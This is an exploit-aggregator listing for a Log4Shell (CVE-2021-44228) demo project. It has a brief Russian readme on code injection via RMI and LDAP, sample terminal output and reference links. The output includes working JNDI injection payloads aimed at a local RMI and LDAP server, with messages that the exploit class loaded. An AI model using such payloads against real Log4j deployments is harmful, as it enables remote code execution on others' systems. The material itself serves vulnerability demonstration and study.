Sploitus

Exploit for CVE-2021-44228-Demo

kitploit · 2026-08-27

Exploit Code

MARKDOWN26 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MZLOGIN-CVE-2021-44228-DEMO
# CVE-2021-44228-Demo

Пример удаленного внедрения кода с использованием CVE-2021-44228 через RMI и LDAP.

![](https://assets.kitploit.com/production/public/readmes/29713/aa4fac98d677d12a5819f72b93434145a5de7f1a9dc03c3c30ef6a3c8dddb1d3.png)

root@kitploit:~
    
    
    Exploit class from RMI Server loaded
    Hello, ${jndi:rmi://127.0.0.1:1099/exploit}
    Exploit class from LDAP Server loaded
    Hello, ${jndi:ldap://127.0.0.1:1389/org.mazhuang.ldap.Exploit}
    

Запуск RmiServer и LdapServer зависит от Python3.

## Ссылки

  * Воспроизведение уязвимости удаленного выполнения кода Apache Log4j2
  * Уязвимость Log4j высокого риска! Анализ конкретных причин! Первый во всем интернете! и Уязвимость Log4j высокого риска (дополнительное видео)
  * Log4j Lookups
  * Apache Log4j2 от RCE до обхода RC1
  * tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
  * PSA: Log4Shell and the current state of JNDI injection